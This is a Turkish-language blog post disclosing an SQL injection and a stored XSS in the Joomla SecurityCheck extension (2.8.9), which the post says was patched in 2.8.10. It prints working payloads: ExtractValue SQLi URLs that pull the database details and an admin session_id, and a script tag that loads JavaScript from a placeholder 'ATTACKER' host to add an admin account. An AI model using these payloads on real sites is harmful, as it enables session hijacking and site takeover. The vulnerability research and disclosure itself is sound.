---
layout: post
date: 2016-06-01 15:25:21 +0300
title: "Joomla SecurityCheck Güvenlik Zafiyeti"
categories: "Güvenlik"
---

"Geçen yine" boş zaman bulup biraz inceleme yapalım dedik :) Bunun üzerine Joomla CMS sisteminde, sisteme yapılan SQL 
Injection, XSS gibi saldırıları algılayıp engelleyen ve loglayan “<strong>SecurityCheck</strong>” eklentisini mercek altına 
aldık. Eklenti üzerinde kısa süre içinde SQLi zafiyeti tespit etmeyi başardık. Bu zafiyeti istismar ederek sistemde bulunan 
aktif yöneticilerin oturumlarını alarak istismarımızı tamamladık. Bu zafiyeti istismar ederken bu sırada sistemde ayrıca 
Stored XSS zafiyeti olduğunu fark ettik ve bu zafiyeti de eklentinin loglarını okuyan bir yöneticinin farkında olmadan panele 
yeni bir admin eklemesini sağlayarak noktaladık. Tüm bunları yaparken Joomla sürümümüz <strong>3.5.1</strong> iken 
SecurityCheck sürümümüz ise <strong>2.8.9</strong>’du. Bu ön bilgilerin ardından girizgâhı burada bitirip zafiyetlere teknik 
olarak artık değinebiliriz.</p>
<h2 id="zafiyetlerin-girdi-noktası:9943c660adc60a9eaed63102d21841c9">Zafiyetlerin Girdi Noktası</h2>
<p>Zafiyetimizin saldırı noktası “<strong>option</strong>” parametresiydi. “<strong>option</strong>” parametresine gelen 
değerin normal şartlar altında bir eklenti adı olması gerekiyordu (yazılımcı bakış açısı), fakat gerçek hayatta o değerler 
değişebiliyor ve farklı şeyler gelebiliyor ki nitekim de öyle oldu :) Dilerseniz şimdi zafiyetlerimizi tek tek 
inceleyelim.</p>
<h2 id="sqli-zafiyeti:9943c660adc60a9eaed63102d21841c9">SQLi Zafiyeti</h2>
<p>SecurityCheck eklentisi, yukarıda da belirttiğimiz gibi sisteme yapılan farklı tipteki (ör. XSS, SQLi gibi) saldırıları 
yakalayıp (Bunu bünyesinde bulunan blacklist ile sağlamakta) loglayan bir eklentidir. Yakalama konusunda oldukça başarılı 
olduğu gözümüze hemen çarpmıştı ☺ Fakat sorun yakaladığı saldırıyı veri tabanına kaydetme kısmındaydı. Zafiyeti daha iyi 
analiz etmek için plugins/system/securitycheck/securitycheck.php dosyasını inceleyelim. Eklentimiz saldırıyı veri tabanına 
securitycheck_logs tablosuna kayıt etmekteydi. Bunun için kullanılan sorgu dosyasında şu şekilde;</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/1.jpg" alt=""></p>
<p>Sorgumuzda direk olarak değişkenler SQL’e dâhil edilmekte, bunu daha iyi anlamak için bu kısmın bulunduğu 
“<strong>grabar_log</strong>” fonksiyonunu ve çağrıldığı yerleri biraz daha dikkatli inceledik. “<strong>$component</strong>” 
değişkenine direk olarak “<strong>option</strong>” parametresinden gelen değerin atandığını ve herhangi bir filtrelemeden 
geçmediğini fark ettik.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/2.jpg" alt=""></p>
<p>İstek ayrıştırılıp ardından <strong>$option</strong>’a bu “<strong>option</strong>” parametresine gelen değer atanıyor. 
Ardından bu değer “<strong>cleanQuery</strong>” metoduna gönderiliyor.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/3.jpg" alt=""></p>
<p>cleanQuery metodunda da herhangi bir filtrelemeye maruz kalmayan parametremiz direk olarak $pageoption’a atanıyor.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/4.jpg" alt=""></p>
<p>Ardından SQL Pattern’den yakalanan bir ifade varsa bu ifadeyi loga kayıt edilmesi için değişkenlerimiz 
<strong>grabar_log</strong>’a gönderiliyor;</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/5.jpg" alt=""></p>
<p>Diğer değişkenler ilk anda <strong>grabar_log</strong> fonksiyonunda <strong>$db-&gt;escape()</strong> metodu ile 
filtreleniyorken $component’ın aynı şekilde filtrelenmemesi yazılımcımızın burada gayet masum bir şekilde “buradan sadece 
eklenti adı gelebilir ya” diye düşünmüş olabileceğini getirdi aklımıza :)</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/6.jpg" alt=""></p>
<p>Insert sorgusuna dâhil edilen bu değişkenimiz sayesinde SQLi zafiyetini istismar etmeyi başardık.</p>
<blockquote>
<p><a 
href="http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1">http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1</a></p>
</blockquote>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/7.jpg" alt=""></p>
<blockquote>
<p><a 
href="http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1">http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1</a></p>
</blockquote>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/8.jpg" alt=""></p>
<blockquote>
<p><a 
href="http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1">http://website/joomla/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1</a></p>
</blockquote>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/9.jpg" alt=""></p>
<p>Buradan sonra artık bu zafiyet ile haklarımızı kolay yoldan yükseltelim dedik ve sistemde aktif bulunan yöneticinin 
oturumunu almayı başardık ve aldığımız oturum kimliğini kullanarak yönetici paneline başarılı bir şekilde giriş yaptık. (Bu 
durum Joomla gibi bir CMS için bizce pek hoş değil). Bu zafiyeti istismar etmek için kullandığımız payload şu şekildeydi;</p>
<pre><code>http://website/joomla/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT concat(session_id) FROM 
%23__user_usergroup_map INNER JOIN %23__users ON %23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON 
%23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
</code></pre>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/10.jpg" alt=""></p>
<p>Payload’da %23 ifadesi dikkatinizi çekmiş olabilir bu ifade # değerinin ASCII karşılığı. # ifadesi sayesinde tablonun ön 
ekini bulmamıza gerek yoktu zira <strong>$db-&gt;setQuery()</strong> metodunda #_ ifadesi ön ek ile değiştirilmekteydi ☺ (# 
karakterini URL encode biçimde göndermemizin sebebi ise tarayıcıda DOM’a düşmemek içindi)</p>
<h2 id="stored-xss-zafiyeti:9943c660adc60a9eaed63102d21841c9">Stored XSS Zafiyeti</h2>
<p>SQLi zafiyetini istismar ederken XSS zafiyeti de olabileceği yönündeki kanılarımızın sonrasında logların yazdırıldığı 
ekranı inceleyelim dedik. İncelerimiz sonucunda ise bu kanımızda da haklı olduğumuzu gördük :)
Bu zafiyeti de incelemek için “administrator/components/com_securitycheck/views/logs/tmpl/default.php” dosyamıza bakalım.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/11.jpg" alt=""></p>
<p>Veritabanına kayıt edilirken herhangi bir filtreleme işleminden geçmeyen “component” değerimiz burada da aynı şekilde 
başımızı ağrıtıyor ve filtreleme olmadığı için direk olarak XSS saldırısına izin veriyor. Burada tek sorunumuz vardı o da 
“component” sütununun 150 karakter limitinin olmasıydı.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/12.jpg" alt=""></p>
<p>Bizde bunun için uzak sunucumuza bir javascript dosyası yükledik ve dosyamızı oradan çektirdik. Dosyamızın içeriğine 
şuradan ulaşabilirsiniz; <a 
href="https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca">joomla_admin_add.js</a>
Saldırı vektörü olarak ise şu payload’ı kullandık;</p>
<pre><code>http://website/joomla/index.php?option=&lt;script&gt;var script = document.createElement('script');script.src = 
"http://ATTACKER/attack.js";document.getElementsByTagName('head')[0].appendChild(script);&lt;/script&gt;
</code></pre>
<p>Bu payloadumuzun yaptığı şey ise yönetici panelinde “securitycheck” logları görüntülenirken yöneticinin farkında olmadan 
yapılan istekler ile yeni bir yönetici eklemesiydi (Bu durum Joomla gibi bir CMS için bizce pek hoş değil).</p>
<p>İsteğimiz saldırı olarak algılanıyor. Böylece loglarda görebileceğiz :)</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/13.jpg" alt=""></p>
<p>XSS ile yeni bir yönetici eklemeden önceki kullanıcılar</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/14.jpg" alt=""></p>
<p>Logları kontrol ederken arkada giden isteğimiz</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/15.jpg" alt=""></p>
<p>Sayfanın kaynağından o alanı kontrol ettiğimizde herhangi özel bir işlemden geçmeden sayfaya eklendiğini görebiliyoruz</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/16.jpg" alt=""></p>
<p>İsteğimiz yapıldıktan sonra eklenen yeni yönetici</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/17.jpg" alt=""></p>
<p>Bu zafiyetler bildirdiğimiz gün içinde hızlıca yama geçilerek kapatıldılar (Teşekkürler Jose!) ve 2.8.10 versiyonu 
yayınlandı (zafiyetten hem SecurityCheck hem de SecurityCheck Pro etkileniyordu). Eski versiyonlara olan erişim ise eklenti 
yazarı tarafından kaldırıldı.</p>
<p><img src="/assets/joomla-security-check-guvenlik-zafiyeti/18.jpg" alt=""></p>
<p>Son olarak şunu söylemek istiyoruz ki “<strong>Güvenlik uygulamalarından çok, daha güvenli uygulamalara ihtiyacımız 
var.</strong>”</p>
<p><strong>Not:</strong> Zafiyetin keşfi ve nokta atışı payloadların geliştirilmesi <strong><a 
href="https://www.gokmenguresci.com" target="_blank" rel="noopener noreferrer">Gökmen Güreşçi</a></strong> ve <strong><a 
href="https://www.muhammetdilmac.com.tr" target="_blank" rel="noopener noreferrer">Muhammet Dilmaç</a></strong>’ın ortak çalışmasıdır.</p>

